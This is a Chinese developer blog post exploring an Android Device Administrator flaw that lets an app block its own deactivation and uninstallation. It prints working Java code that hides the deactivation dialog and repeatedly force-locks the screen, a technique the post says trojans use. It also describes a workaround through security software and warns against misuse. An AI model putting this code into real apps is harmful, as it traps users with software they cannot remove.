编写一个无法卸载的App - 设备管理器漏洞

最新推荐文章于 2023-01-13 00:15:00 发布
最新推荐文章于 2023-01-13 00:15:00 发布
阅读量2.8k 收藏 3
点赞数
分类专栏: 综合

前两天某朋友发现手机有个app无法卸载,后知其因设备管理器激活导致,遂去尝试取消,但却在取消那刻卡机。反复折腾之后,只能重刷。后来他发了一篇关于设备管理器bug的文章给我,便有了如下一番折腾。

尝鲜

文章《Android 学习 设备管理器勾选后不能再取消了》(作者:带个回家)大致意思是:

继承 DeviceAdminReceiver 重写 onDisableRequested(Context context, Intent intent) 即可达到目的。

@Override
public CharSequence onDisableRequested(Context context, Intent intent) {
    // 这里处理 不可编辑设备。
    Intent intent2 = new Intent(context, NoticeSetting.class);
    intent2.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
    context.startActivity(intent2);
    context.stopService(intent);// 是否可以停止
    return ""; // "这是一个可选的消息,警告有关禁止用户的请求";
    }

在此之前,我并没有接触过设备管理器的功能,参考了 API Guides 的  Device Administration ,以及  DeviceAdminReceiver 的 API 后,试着写了一个跟上述文章一样的 app, 4.4 & 5.0均测试失败,可以正常取消激活

再战

搜索,找到《Android设备管理器漏洞》(作者:Jack_Jia)另一篇讲解此问题的文章。文章提到:

如果想在设备管理器列表中”隐身“,只要不注册 android.app.action.DEVICE_ADMIN_ENABLED广播就行。

也就是不给 intent-filter 标签设置该 action。

<receiver
    android:name=".MyDeviceReceiver"
    android:description="@string/receiver_description"
    android:label="@string/app_name"
    android:permission="android.permission.BIND_DEVICE_ADMIN">
    <meta-data
        android:name="android.app.device_admin"
        android:resource="@xml/device_manager_policies" />
    <intent-filter>
    
    </intent-filter>
</receiver>

4.4 & 5.0测试失败,设备管理器无法激活(代码激活不会弹出,设备管理器又找不到)。

三战

继续搜索,发现百度安全实验室一篇文章《Android设备管理器漏洞2》。文章提到:

已激活设备管理器权限的手机木马利用该漏洞,可以在设置程序的设备管理器列表中隐藏,这样用户就无法通过正常途径取消该手机木马的设备管理器权限,从而达到无法卸载的目的。Android4.2版本以上系统已经修复该漏洞。

通过调用stopAppSwitch()方法,系统保证在进入取消设备管理器界面后,5秒内不会进行Activity的切换。

onDisableRequested函数满足以下条件即可:

1、返回内容不能为空,这样才可以使设备管理器弹出取消激活设备管理器警示信息 Dialog。

2、通过Activity切换的方式使设备管理器弹出的警示信息Dialog消失。使用户无法操作Dialog。
如果做到以上两点,程序即可成功阻止用户取消激活设备管理器操作。

故,只要在 onDisableRequested 方法中,让用户在取消激活时5s内无法操作界面,然后采取 Activity 切换的方法即可绕开取消激活的步骤。这里为了测试直观并且试一试设备管理器的 api,采用了百度提供的连续锁屏法。测试环境为5.0。

public CharSequence onDisableRequested(Context context, Intent intent) {                                            
                                                                                                                    
    //跳离当前询问是否取消激活的 dialog                                                                                          
    Intent outOfDialog = context.getPackageManager().getLaunchIntentForPackage("com.android.settings");             
    outOfDialog.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);                                                            
    context.startActivity(outOfDialog);                                                                             
                                                                                                                    
    //调用设备管理器本身的功能,每 100ms 锁屏一次,用户即便解锁也会立即被锁,直至 7s 后                                                                
    final DevicePolicyManager dpm = (DevicePolicyManager) context.getSystemService(Context.DEVICE_POLICY_SERVICE);  
    dpm.lockNow();                                                                                                  
    new Thread(new Runnable() {                                                                                     
        @Override                                                                                                   
        public void run() {                                                                                         
            int i = 0;                                                                                              
            while (i < 70) {                                                                                        
                dpm.lockNow();                                                                                      
                try {                                                                                               
                    Thread.sleep(100);                                                                              
                    i++;                                                                                            
                } catch (InterruptedException e) {                                                                  
                    e.printStackTrace();                                                                            
                }                                                                                                   
            }                                                                                                       
        }                                                                                                           
    }).start();                                                                                                     
                                                                                                                    
    return "";                                                                                                      
}

  1. 安装后打开直接跳转激活界面:
    安装后打开直接跳转激活界面

  2. 一旦激活则无法正常卸载
    一旦激活则无法正常卸载

  3. 进入设备管理器界面
    进入设备管理器界面

  4. 尝试取消激活
    尝试取消激活

  5. 强制进入锁屏
    强制进入锁屏

至此,用户用普通方法无法卸载该app。测试使用某数字软件可以卸载,具体步骤:在数字软件的软件卸载功能中卸载Trick,此时提示取消激活,跳转到设备管理器界面取消激活,引发锁屏,强制锁屏7s结束后,切回数字软件,你会发现出现了取消激活的dialog,点击取消成功。

而文章开头提到的流氓软件,实则是跳转到一个所有按钮无效的自定义全屏界面(不是我这样跳到设置界面),使用数字软件无法解决问题。

总结

日后看到设备管理器激活申请定要小心三分,本文提及内容请勿不正当使用。

相关下载


chaozhung
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
黑科技——编写一个无法卸载App
weixin_30564901的博客
01-07 176
之前经常听到朋友或者新闻媒体上报道说,有的朋友的android手机中病毒了,出现了软件无法卸载的情况,对于我这样一个从事android开发程序员来说,我还不是太相信(毕竟自己还是有点菜,哈哈)。今天在研究一键锁屏这个小应用的时候,发现在android系统中的确存在这样一种应用,会让你的程序无法卸载,我之前的时候只知道android系统内置的应用无法卸载的,现在却发现并不只有这种应用无法卸载,还有利...
小心stopAppSwitches这个坑
张小强的专栏
08-09 5308
简介本文是在APP界面点击Home键后,马上在后台启动Activity会延时5秒而引起的源码分析。案例还原在APP界面,点击Home键后会打开一个悬浮窗,以表示APP在后台运行。点击悬浮窗上的按键会返回APP。就是这么一个简单的过程,却无意中发现了这个BUG。当我点击Home键后,回到主桌面,然后点击悬浮窗上的按钮返回APP,而APP不会马上返回,需要延时一段时间才会启动,开始我以为是APP初始化比
Android防止意外卸载
lemisky的博客
10-21 2261
最近有个奇怪的想法,如何防止应用不小心被卸载呢? 简单的解决方案:将应用设置为设备管理器 public class Policy { private DevicePolicyManager policyManager; private ComponentName componentName; public Policy(Activity activity) { ...
Android设备管理器漏洞2--阻止用户取消激活设备管理器
热门推荐
移动安全研究和Android/iOS/小程序隐私合规
10-10 1万+
日前,百度安全实验室发现手机木马开始利用另一新的Android设备管理器漏洞,新的设备管理器漏洞是由于Android系统在取消激活设备管理器流程的设计缺陷引起的,恶意软件利用该设计缺陷,可以阻止用户取消激活设备管理器,进而达到反卸载的目的。该漏洞存在于Android系统所有版本。
AMS- Activity分析
woai110120130的专栏
03-20 1859
Activity的管理算是ams中最为复杂的部分,为了弄清楚WMS的窗口管理,不可能跳过Activity的管理,这里就进行第三遍系统的分析Activity的管理 AMS—-&gt; public final int startActivity(IApplicationThread caller, String callingPackage, Inten...
利用设备管理器漏洞编写一个无法卸载App
08-26
标题提到的“利用设备管理器漏洞编写一个无法卸载App”涉及到的是Android操作系统中的设备管理器功能,以及可能存在的安全漏洞和恶意应用行为。设备管理器是Android系统的一个内置工具,主要用于企业环境,允许...
安卓安装卸载相关-Android利用设备管理器实现APP无法卸载功能.rar
07-29
总结来说,Android利用设备管理器实现APP无法卸载功能主要通过声明设备管理员权限,引导用户启用设备管理器,并在启用后使用`DevicePolicyManager`的`setUninstallBlocked`方法阻止卸载。这种做法主要用于增强企业...
应用卸载-Uninstall App - Clear Cache
最新发布
04-17
应用卸载是一款安卓程序卸载利器,工具应用。 ①提供卸载应用程序功能,帮助清除掉手机上垃圾程序; ②采用智能直接删除程序文件,及其关联缓存文件等,轻松卸载程序; ③目前只支持卸载除系统程序外的应用程序,...
Android设置APP无法卸载
08-30
下面将详细阐述如何通过设备管理器实现APP无法卸载的功能以及其背后的原理。 ### 一、设备管理器API介绍 设备管理器是Android提供的一种安全机制,允许第三方应用成为设备管理员,并执行一些强化安全性的操作。...
安卓安装卸载相关-监听APP卸载.rar
07-29
测试这类功能并不容易,因为直接在设备上卸载APP会导致接收器无法触发。一种常见做法是在另一个应用中模拟卸载事件,或者在模拟器中使用ADB命令来卸载应用。 ```sh adb shell pm uninstall your.package.name ``` ...
安卓防卸载的实现。。
01-02
卸载的实现,具体http://blog.csdn.net/u012833250/article/details/50448136
android设备管理器(只有提示用户激活后,才可以使用)--DevicePolicyManager:
TryIT1993的专栏
10-09 6058
1.android设备管理器(只有提示用户激活后,才可以使用)--DevicePolicyManager: 使用到三个类: DevicePolicyManager 密码定义的长度,密码是否要含大写字母,小写字母等设置密码需要满足的规范,锁定设备或是清除所有用户数据,要配合DeviceAdminReceiver来使用 方法: 1.进行锁屏操作 mD
Android7.1 做到完全的禁止apk卸载
chen_jinhua的博客
04-09 4489
在android方案定制中,如果需求是apk不可卸载,那么你肯定会想到一种解决办法,就是把apk内置在系统中,再给个系统签名,就噢了.嗯这确实是一种简单易用的方案,这样内置的app安装在系统的system/app/目录下,拥有系统权限,即是系统应用了.无法卸载,(当然,有root权限进去目录删除除外) 但是,但是来了,我今天给你们介绍一种直接安装也能实现无法卸载的处理办法,请听我细细道来,我们都知道在安装中直接在文件管理器中点击apk包去安装或者用adb命令的方式去安装,都是可以的,apk的安装路径是在d
Android 11.0 系统settings详情页 卸载修改为停止,禁止卸载app功能实现
安卓兼职framework和app工程师的博客
01-13 1167
在11.0的系统产品开发中,对于一些预安装的app,不想卸载这个app,在设置详情页里面就需要把卸载 修改为 停止,还需要在PMS的卸载方法中,根据包名拒绝卸载 这里只讲解在系统settings里面,点击这个app进入app详情页后,修改卸载为停止的功能实现
编写一个无法卸载App - 设备管理器漏洞--进阶
chaozhung的专栏
05-10 2360
Android上使用设备管理器漏洞达到防卸载的目的请参照:https://blog.csdn.net/chaozhung_no_l/article/details/52329341经过多设备测试后发现一个卸载漏洞,在取消激活黑屏后,再次进入界面时点击系统Back键或者点击Menu键会在最近任务列表内出现设备管理器取消确认的弹窗,这样就可以进一步的卸载。该问题出现原因无非下面两种状况:1、get...
AMS—启动一个Activity(基于深入理解Android)
淡淡的宁静的博客
07-16 964
am启动一个activity 在前面先作一个精简的总结 从上图说起,上图分析到为Activity所在进程zygote一个进程,其实zygote一个进程,就是为其分配私有空间,分配一个process_id,ProcessRecord(应该相当于进程描述符吧)。随意此图没有涉及到Activity的内容。那么接下来,简要的分析流程中的每个方法的作用: ActivityManager
按home键后stopAppSwitches延时5S
marshal_zsx的博客
03-30 1049
1、简介 本文是在APP界面点击Home键后,马上在后台启动Activity会延时5秒而引起的源码分析文章。 2、现象描述 在APP界面,点击Home键后会打开一个悬浮窗,以表示APP在后台运行。点击悬浮窗上的按键会返回APP。就是这么一个简单的过程,却无意中发现了这个BUG。当我点击Home键后,回到主桌面,然后点击悬浮窗上的按钮返回APP,而APP不会马上返回,需要延时一段时间才会启动,开始我...
激活设备管理器权限,防止被卸载
u012389581的专栏
02-16 4835
设备管理器权限,对于这个权限还有一个重要作用,就是可以防止应用被卸载,现在很多应用为了防止自己被用户无情的卸载了,就用这个权限.激活设备管理器也可以用于防卸载,只是到Android5.0以上版本,可能会失灵。 具体设置方法在这个里面 http://blog.csdn.net/ice_eyes/article/details/52951343?locationNum=2&fps=1
编写一个无法卸载App设备管理器漏洞
xyxjn的专栏
09-16 5093
https://mp.weixin.qq.com/s?__biz=MzA3MDMyMjkzNg==&mid=211618188&idx=1&sn=4b08a3058b7d4861b5ade7024a02266e&scene=2&srcid=0915Dfg09vdhx4XRzLEM7ket&from=timeline&isappinstalled=0&key=dffc561732c22651f679
怎么卸载uni-canvas
09-16
### 回答1: 卸载uni-canvas可以使用以下步骤: 1. 在你的终端或命令行中进入你的项目文件夹。 2. 输入以下命令来卸载uni-canvas: ``` npm uninstall uni-canvas ``` 如果你使用的是 yarn,则可以使用以下命令来卸载uni-canvas: ``` yarn remove uni-canvas ``` 3. 等待卸载过程完成。 注意: 如果你在你的项目中使用了 uni-canvas,在卸载之后可能需要手动修改你的代码来删除对 uni-canvas 的任何引用。 ### 回答2: 要卸载uni-canvas,可以按照以下步骤进行操作: 1. 首先,打开你的项目文件夹。 2. 在项目文件夹中,找到使用uni-canvas的相关文件,通常是在pages目录下的某个页面组件中引入了uni-canvas组件。 3. 打开引入了uni-canvas组件的页面组件文件,通常是以.vue为后缀的文件。在该文件中,找到对uni-canvas的引用代码。 4. 注释或删除对uni-canvas的引用代码,并保存文件。 5. 接下来,查找是否有其他与uni-canvas有关的文件,例如自定义组件或者插件。 6. 如果存在其他与uni-canvas有关的文件,也需要同样地注释或删除对uni-canvas的引用代码,并保存这些文件。 7. 卸载uni-canvas相关的npm包。在命令行中,进入到你的项目文件夹下,运行以下命令: ``` npm uninstall uni-canvas ``` 8. 等待npm包的卸载过程完成。 9. 在你的项目文件夹中,删除uni-canvas相关的文件和文件夹。包括卸载后通过npm命令生成的缓存文件夹和依赖文件。 10. 最后,重新编译你的项目,以确保uni-canvas完全从你的项目中移除。 以上是卸载uni-canvas的简要步骤,按照这些步骤操作后,你应该能够成功卸载uni-canvas。如果在操作过程中遇到问题,可以查阅uni-canvas的官方文档或者寻求相关开发人员的支持。 ### 回答3: 要卸载uni-canvas,可以按照以下步骤进行操作: 1. 打开uni-app项目的工程目录。 2. 进入项目的package.json文件。 3. 在该文件中,找到并定位到依赖项部分。 4. 在依赖项列表中,查找并找到uni-canvas的相关依赖项。 5. 记住相关依赖项的名称,例如 "@dcloudio/uni-canvas"。 6. 打开终端或命令行界面。 7. 在终端或命令行界面中,使用npm命令或yarn命令来卸载相关依赖项。 8. 使用命令类似于 "npm uninstall @dcloudio/uni-canvas" 或 "yarn remove @dcloudio/uni-canvas"。 9. 执行卸载命令后,等待相关依赖项被成功卸载。 10. 检查终端或命令行界面的输出,确认卸载的相关依赖项是否成功。 11. 如果一切顺利,终端或命令行界面将显示成功卸载相关依赖项的信息。 12. 重新编译项目,确保卸载uni-canvas不会导致任何错误。 以上是卸载uni-canvas的简单步骤。根据个人项目的具体情况,可能还需要进行其他操作,如清除缓存或配置文件等。如有需要,可以参考uni-app的官方文档或相关论坛获取更详细的指导。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值